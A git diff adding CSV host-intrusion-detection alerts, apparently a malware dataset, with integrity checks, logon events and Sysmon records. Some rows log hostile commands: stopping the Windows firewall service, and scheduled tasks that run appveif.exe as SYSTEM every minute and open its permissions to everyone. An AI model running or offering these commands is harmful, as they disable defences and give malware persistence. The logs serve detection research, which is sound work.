'0a808618d3ad142d9f619d043ca088fdcfc9a841' +New sha1sum is : '9a0d97c845587be7605acb61023bb439126934df' +", +"Apr 24, 2020 @ 10:55:17.720",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: 'e72eae0fec329e0227c0acc6aad332c2' +New md5sum is : '5727fcd23252b0e1550791766fd7e652' +Old sha1sum was: '2b49b1970c5bb2cfdd9508be50951510ea0093de' +New sha1sum is : '1a0a4badb9ef02d3f518064090d622844165b266' +", +"Apr 24, 2020 @ 10:55:16.643",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: 'ae9643074ec7a4ef81bb63a482e527c9' +New md5sum is : '8babdce3ab05d3473a80df927d06237f' +Old sha1sum was: 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +New sha1sum is : 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +", +"Apr 24, 2020 @ 10:55:13.595",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-6904 + Account Name: sshd_6904 + Account Domain: VIRTUAL USERS + Logon ID: 0x103CAE + +Logon Type: 5 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 10:55:13.516",3,"IIS NetworkCleartext Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 8 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x10E24E + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x1af8 + Process Name: C:\Windows\System32\OpenSSH\sshd.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:55:13.362",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:55:13.161",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" diff --git a/data/MW_1_HIDS_3.csv b/data/MW_1_HIDS_3.csv new file mode 100644 index 0000000..7d9c135 --- /dev/null +++ b/data/MW_1_HIDS_3.csv @@ -0,0 +1,395 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log" +"May 22, 2020 @ 15:34:48.419",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '05688d3fb01c8753b031688cb1be8a9a' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '07d2e2efcc0eef4f0950f87eb46ce7cb7d621014' +" +"May 22, 2020 @ 15:34:48.415",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'b9b17232ab989d43145b713d83b31e56' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '59a9b4d3dd2bb5573d31e1aff08c6d38bf7d7d43' +" +"May 22, 2020 @ 15:34:46.106",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"May 22, 2020 @ 15:34:31.496",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"May 22, 2020 @ 15:34:12.594",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{00080000-B1BA-11CE-ABC6-F5B2E79D9E3F}' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '47bd772cab29cc8ea332945ac72cdd4a' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '308d94b65326a36b3f8d9e5dcb729d52b07b5a23' +" +"May 22, 2020 @ 15:33:15.454",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"May 22, 2020 @ 15:33:08.077",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""", +"May 22, 2020 @ 15:32:11.009",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 22, 2020 @ 15:32:10.978",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 22, 2020 @ 15:32:10.962",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{00080000-B1BA-11CE-ABC6-F5B2E79D9E3F}' checksum changed. +Old md5sum was: '47bd772cab29cc8ea332945ac72cdd4a' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '308d94b65326a36b3f8d9e5dcb729d52b07b5a23' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 22, 2020 @ 15:32:02.542",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:17.943 +ProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000} +ProcessId: 488 +Image: C:\Windows\system32\csrss.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0 +Details: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:17.946044000Z"",""eventRecordID"":""1589"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:17.943\r\nProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:17.943"",""processGuid"":""{df9fc3d3-d0cd-5ec7-0000-001050a30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}" +"May 22, 2020 @ 15:28:58.654",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 22, 2020 @ 15:28:00.188",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:15.893 +ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f4551900} +ProcessId: 4376 +Image: C:\Windows\SysWOW64\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop MpsSvc +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18 +ParentProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900} +ParentProcessId: 1312 +ParentImage: C:\Windows\SysWOW64\net.exe +ParentCommandLine: net stop MpsSvc""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.926691300Z"",""eventRecordID"":""974"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.893\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f4551900}\r\nProcessId: 4376\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop MpsSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900}\r\nParentProcessId: 1312\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: net stop MpsSvc\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.893"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010f4551900}"",""processId"":""4376"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop MpsSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-d153-5ec7-0000-0010be1d1900}"",""parentProcessId"":""1312"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""net stop MpsSvc""}}}" +"May 22, 2020 @ 15:27:59.257",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:15.191 +ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f41f1900} +ProcessId: 3872 +Image: C:\Windows\SysWOW64\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: schtasks /create /sc minute /mo 1 /tn ""Netframework"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\John Williams\Downloads\appveif.exe /p everyone:F"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800} +ParentProcessId: 6520 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Netframework"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\John Williams\Downloads\appveif.exe /p everyone:F""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.285158800Z"",""eventRecordID"":""972"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.191\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f41f1900}\r\nProcessId: 3872\r\nImage: C:\\Windows\\SysWOW64\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks /create /sc minute /mo 1 /tn \""Netframework\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\John Williams\\Downloads\\appveif.exe /p everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800}\r\nParentProcessId: 6520\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Netframework\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\John Williams\\Downloads\\appveif.exe /p everyone:F\""\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.191"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010f41f1900}"",""processId"":""3872"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""schtasks /create /sc minute /mo 1 /tn \\\""Netframework\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-0010f8951800}"",""parentProcessId"":""6520"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Netframework\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe /p everyone:F\\\""""}}}" +"May 22, 2020 @ 15:27:59.199",10,"ATT&CK: Suspicious Process Creation","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:15.147 +ProcessGuid: {df9fc3d3-d153-5ec7-0000-00100d1e1900} +ProcessId: 6968 +Image: C:\Windows\SysWOW64\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: schtasks /create /sc minute /mo 1 /tn ""Miscfost"" /ru system /tr ""cmd /c C:\Windows\ime\appveif.exe"" +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800} +ParentProcessId: 6580 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Miscfost"" /ru system /tr ""cmd /c C:\Windows\ime\appveif.exe""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.282583800Z"",""eventRecordID"":""971"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.147\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-00100d1e1900}\r\nProcessId: 6968\r\nImage: C:\\Windows\\SysWOW64\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks /create /sc minute /mo 1 /tn \""Miscfost\"" /ru system /tr \""cmd /c C:\\Windows\\ime\\appveif.exe\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800}\r\nParentProcessId: 6580\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Miscfost\"" /ru system /tr \""cmd /c C:\\Windows\\ime\\appveif.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.147"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-00100d1e1900}"",""processId"":""6968"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""schtasks /create /sc minute /mo 1 /tn \\\""Miscfost\\\"" /ru system /tr \\\""cmd /c C:\\\\Windows\\\\ime\\\\appveif.exe\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-0010fe8d1800}"",""parentProcessId"":""6580"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Miscfost\\\"" /ru system /tr \\\""cmd /c C:\\\\Windows\\\\ime\\\\appveif.exe\\\""""}}}" +"May 22, 2020 @ 15:27:59.171",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:15.143 +ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900} +ProcessId: 1312 +Image: C:\Windows\SysWOW64\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: net stop MpsSvc +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076 +ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010ffa31800} +ParentProcessId: 5872 +ParentImage: C:\Windows\SysWOW64\cmd.exe +ParentCommandLine: cmd /c net stop 